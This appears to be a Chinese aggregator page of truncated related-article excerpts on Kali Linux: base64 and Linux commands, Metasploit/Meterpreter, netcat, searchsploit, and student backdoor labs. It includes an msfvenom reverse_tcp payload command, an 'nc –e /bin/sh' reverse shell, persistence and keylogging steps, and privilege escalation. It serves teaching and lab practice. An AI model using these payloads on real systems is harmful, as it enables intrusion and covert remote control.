kali base64命令的使用】的更多相关文章

1.启动终端 2.输入base64 3.输入需要编码的字符串 4,CTRL+D,结束输入,在屏幕上回显输出结果…
系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示CPU info的信息 cat /proc/interrupts 显示中断 cat /proc/meminfo 校验…
一.简介 对文件件进行base64的编码与解码 二.语法 openssl base64 [-in filename] [-out filename] 三.实例 1.二进制文件与base64编码互转 openssl base64 -in pubkey.bin -out pubkey.pemopenssl base64 -d -in pubkey.pem -out pubkey.bin 参考:http://blog.csdn.net/as3luyuan123/article/details/1441…
apt-get常用命令:update – 取回更新的软件包列表信息upgrade – 进行一次升级install – 安装新的软件包(注:软件包名称是 libc6 而非 libc6.deb)remove – 卸载软件包purge – 卸载并清除软件包的配置autoremove – 卸载所有自动安装且不再使用的软件包dist-upgrade – 发布版升级,见 apt-get(8)dselect-upgrade – 根据 dselect 的选择来进行升级build-dep – 为源码包配置所需的编…
  0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道.使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接.Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户.隐藏一些东西.打开shell.得到用户密码.上传下载远程主机的文件.运行cmd.exe.捕捉屏幕.得到远程控制…
目录 netcat netcat https://blog.csdn.net/fageweiketang/article/details/82833193 网络工具当中的瑞士军刀 -nc指令,nc可以完成teilnet所有的工作. 1 侦听传输 2 获取banner信息 3 传输文本信息 4 加密传输文件 5 远程控制木马 6 加密所有流量 7 流媒体服务器 8 远程克隆光盘 指令参数: nc作为客户端的时候可以对服务器进行探测. 经常使用的参数:-v 显示详细的输出内容 -n 不进行dns解析…
Searchsploit Searchsploit会通过本地的exploit-db, 查找软件漏洞信息 打开kali的命令行, 输入: searchsploit 查看系统帮助 查找mssql的漏洞 如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息: searchsploit mssql 要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开即可: leafpad /usr/share/ex…
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333-.),下面记录一下初步使用Metasploit的过程.首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍.Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具.当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了.仿佛一夜之间…
做开发第一个接触的编码方式就是Base64,当时是用url来传输一些参数,传输的两端会用Base64来编码和解码,保证数据不被url转义破坏. 下面是 维基百科 Base64 中的介绍,其实自己实现起来也不是很麻烦. Base64 是一种基于64个可打印字符来表示二进制数据的表示方法.由于2的6次方等于64,所以每6个比特为一个单元,对应某个可打印字符.三个字节有24个比特,对应于4个Base64单元,即3个字节需要用4个可打印字符来表示.它可用来作为电子邮件的传输编码.在Base64中的可打印…
Kali介绍 Kali Linux是基于debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 . Kali Linux预装了许多渗透测试软件,包括nmap .Wireshark .John the Ripper,以及Aircrack-ng用户可通过…
Linux下md5sum命令可以直接计算标准输入的hash值,使用方式为 echo -n '123456' | md5sum 注意给echo加上-n表示在尾部不加换行 命令行示例 $ echo -n '123456' | md5sum e10adc3949ba59abbe56e057f20f883e - #后边的连字符-表示这是标准输入的hash值 $ echo '123456' | md5sum #作为对比 f447b20a7fcbf53a5d5be013ea0b15af - 对比其它工具的结…
查看源码得知由vim编写,所以查找备份以及交换文件 找到 /.index.php.swp ,下载后用vim -r恢复该文件即可得到源码 1 <html> 2 <head> 3 <title>blind cmd exec</title> 4 <meta language='utf-8' editor='vim'> 5 </head> 6 </body> 7 <img src=pic.gif> 8 <?php…
记录一个问题: 使用java,或者命令行 base64 命令加密图片文件成加密数据后无法还原成图片 深入:使用java base64工具(sun base64或bouncycastle)加密的数据替换掉空行符以及加上解析头:“data:image/jpeg;base64,”后就可以成为前端可以展示的图片了,但是加上头后解密出来的jpg文件却仍然无法如同正常图片一样打开. 待续研究. 如果遇到图片无法在前端打开的问题,参考如下即可: String solvedImage = encoder.enc…
Kali Linux 命令集 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2)uname -r 显示正在使用的内核版本dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI)hdparm -i /dev/hda 罗列一个磁盘的架构特性hdparm -tT /dev/sda 在磁盘上执行测试性读取操作cat /proc/cpuinfo 显示CPU info的信息cat /proc/interrupts 显示中断cat /proc/me…
Installing Kali NetHunter On the OnePlus 6 准备工具: adb: https://jingyan.baidu.com/article/22fe7cedf67e353002617f25.html twrp: https://www.twrp.me/(需要下载相同版本的.img与.zip) magisk: https://github.com/topjohnwu/Magisk kali nethunter镜像: https://www.kali.org/ge…
一.工具和平台 主要工具: Kali Linux Ghidra 9.0.4 010Editor 9.0.2 样本环境: Windows7 phpStudy 20180211 二 .分析过程 先在 Windows 7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中. 根据网上公开的信息:后门存在于 php_xmlrpc.dll 文件中,里面存在“eval”关键字,文件 MD5 为 c339482fd2b233fb0a555b629c0ea5d…
仅供个人娱乐 靶机搭建与下载 Monraker靶机ip: 192.168.181.135 kali攻击者ip : 192.168.181.128 说明:获取目标主机的root权限并读取目录中的flag.txt文件 一.主机探测 Ip arp-scan -l netdiscover -i eth0 -r 192.168.181.1/24 nmap -sn  192.168.181.1/24 端口 nmap -sS -n  192.168.181.135 nmap -sV -n  192.168.1…
攻防世界 Misc 新手练习区 坚持60s Writeup 题目介绍 题目考点 java反编译 jd-gui 的使用 Writeup 下载附件并打开 kali执行命令 java -jar 9dc125bf1b84478cb14813d9bed6470c.jar 看到是一个小游戏,尝试玩了一下,死的很快,但是几次死的时间不同 直接拖到 jd-gui 中反编译,基本遍历了一遍代码,最后在一个游戏类中发现flag 看见这个flag有点像base64编码,解码得 最终得到flag flag{DajiDa…
早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下. 在JBoss服务器上部署web应用程序,有很多不同的方式,诸如:JMX Console.Remote Method Invocation(RMI).JMXInvokerServlet.HttpAdapter等. 本文主要是关于RMI远程方法调用漏洞的,其它几种部署方式比如JMX Console,也是会有漏洞的,主要看JBoss服务器的…
Office隐藏17年的漏洞CVE_2017_11882测试记录 创建时间: 2017/11/25 0:18 作者: CN_Simo 标签: Office漏洞 参考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html 参考文章2:https://www.cnblogs.com/i-honey/p/7885573.html   POC地址:https://github.com/Ridter/CVE-2017-11882/   中间环节出现,msf连接数…
站在巨人的肩头才会看见更远的世界,这是一篇来自技术牛人的神总结,运用多年实战经验总结的CTF取证方法,全面细致,通俗易懂,掌握了这个技能定会让你在CTF路上少走很多弯路,不看真的会后悔! 本篇文章大约6千字,阅读时间需20分钟,希望大家耐心看完! 取证 在CTF(Capture The Flag,中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式)中,取证的挑战可能包括文件格式分析,隐写术,内存转储分析或网络数据包捕获分析等.检查和处理静态数据文件,而不是可…
目录 -- 后门原理与实践 后门原理与实践说明 实验任务 基础知识问答 常用后门工具 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MSF meterpreter生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 实验遇到的问题及解决方法 实验收获与感想 1 后门原理与实践说…
一.基础问题回答 (注:本实验中在win7上使用的ncat.exe和socat.exe均可在实验指导的附件中下载) 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:非官方网站下载资源时,可能附带下载后门软件:下载安装破解版软件:随意点击收到的陌生链接 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:win : 双击直接执行:通过任务计划程序启动:在开机启动项中,随着开机,直接启动 linux : 通过cron指令,制定任务,从而启动:通过脚本启动 3.Meterpr…
一.实践目标 1.一个主动攻击实践 ms08_067 2.一个针对浏览器的攻击 ms13-069 3.一个针对客户端的攻击 adobe (Adobe_toolbutton客户端漏洞) 4.成功应用任何一个辅助模块 auxiliary/server/browser_autopwn模块 问题回答: 用自己的话解释什么是exploit,payload,encode exploit:用来打开攻击者与被攻击者的通道,开始攻击.核弹头 payload:攻击载荷,用什么方式攻击.核弹载具 encode:进行编…
一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) 实验准备 windows环境下下载老师提供的ncat和soc…
1 实验内容 1.1实验主要内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)可选加分内容:使用MSF生成shellcode,…
  0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口…
Exp2 后门原理与实践 一.基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:在网上点击不安全的网页或链接. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答: windows : 先关闭防火墙和杀毒软件,右键管理员运行,通过cmd来运行. linux : 通过crontab指令,由计划任务启动. 3.Meterpreter有哪些给你映像深刻的功能? 答:Meterpreter不只可以录音截屏,还可以记录键盘输入和录像,这说明如果我们的电脑被装入后门,…
Exp2 后门原理与实践 20164318 毛瀚逸 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:下载奇怪的文件并运行,通过操作系统的漏洞来获取电脑的高级权限. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:设置定时运行,在设定的时间自动启动. 3.Meterpreter有哪些给你映像深刻的功能? 答:拍照,如果别人入侵了我的电脑,是不是可以随时窥探我在做什么呢. 4.如何发现自己有系统有没有被安装后门? 答:各种杀软都应该可以应付…
Exp2 后门原理与实践 任务一:使用netcat获取主机操作Shell,cron启动 1.windows获取linux shell 1.1 ipconfig  查看本机查看以太网适配器(8)的ipv4地址 1.2windows:  ncat.exe -l -p   调用ncat.exe程序来蹲守本机的4325端口 1.3  nc –e /bin/sh  在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口: 2.linux获得windows shell 2.1 Ka…